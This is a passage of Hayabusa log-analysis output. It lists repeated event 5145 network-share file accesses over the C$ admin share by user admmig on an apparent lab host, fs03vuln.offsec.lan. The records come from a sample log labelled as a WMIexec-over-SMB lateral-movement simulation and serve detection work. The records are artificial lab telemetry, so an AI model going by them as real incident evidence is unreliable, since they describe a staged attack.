Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ComSvcConfig\b22b9bfb4d9b4b757313165d12acc1b1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.573 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\CustomMarshalers\3028a8133b93784c0a419f1f6eecb9d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\dfsvc\caea217214b52a2ebc7f9e29f0594502 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EmbeddedLockdown\d890cdf716b288803af7c42951821885 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\EventViewer\508676af4bc32c6cdfa35cb048209b2a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\ipamapi\893f9edeb6b037571dca67c05fad882e : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.589 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A3ec156ec#\b8fd553238ff003621c581b8a7ab9311 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.A26c32abb#\f51b67a5b93d62c5a6b657ebfd8cdaea : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.604 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Abf69f55a#\077014d070d56db90f9a00099da60fa8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B22c61a69#\a8aada24560f515d50d1227a4edb9a68 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.620 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B46c55d17#\a3f0de129553f858134a0e204ddf44c3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.642 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B83e9cb53#\b2eb2f250605eb6b697ed75a050e9fa1 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.B3325a29b#\2d63d4f586d1192cb1d550c159a42729 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Baa2ca56b#\71d44db8d855f43bafe707aabf0050d7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.652 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Bfc9dc24d#\d33525eb35c4aa8b45b1e60e144e50ab : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Build\d6c8ca8dfe9cd143210459e72a546bf8 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.683 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C8d726d22#\95eb335a0d6884a4b311ce7041f71bc3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C25dcfcb8#\81fd3145ed18f31e338ec4dcb5afd7f7 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.699 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.C26a36d2b#\2dab9f12dfcdb3bd487693c1bb12e0a6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ca018eff0#\4d5abc40df9ad72124f147d1d55dd690 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.714 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.CSharp\004d51a9ac1d91d6537ad572591ebbd3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.D0ff51f83#\b7a83293c2e4f23480fc3660b70099e6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G46fcc235#\f8fa567f21f9aef0ae471c625b59c159 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.730 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.G91a07420#\5d1b6f60febb9cec91a92675a96ee63d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ga41585c2#\b101a91893057573f159893cb9c2f28d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.746 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I0cd65b90#\e037edd0e9a4a487424cd2d4e3527c92 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.I7676db1a#\aaf7a4161dcd6792ce570a810a0c53f6 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ib6702479#\662c453241af44299325f4c07d7f718c : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx -2021-04-22 20:32:29.764 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Ic1a2041b# : IP Address: 
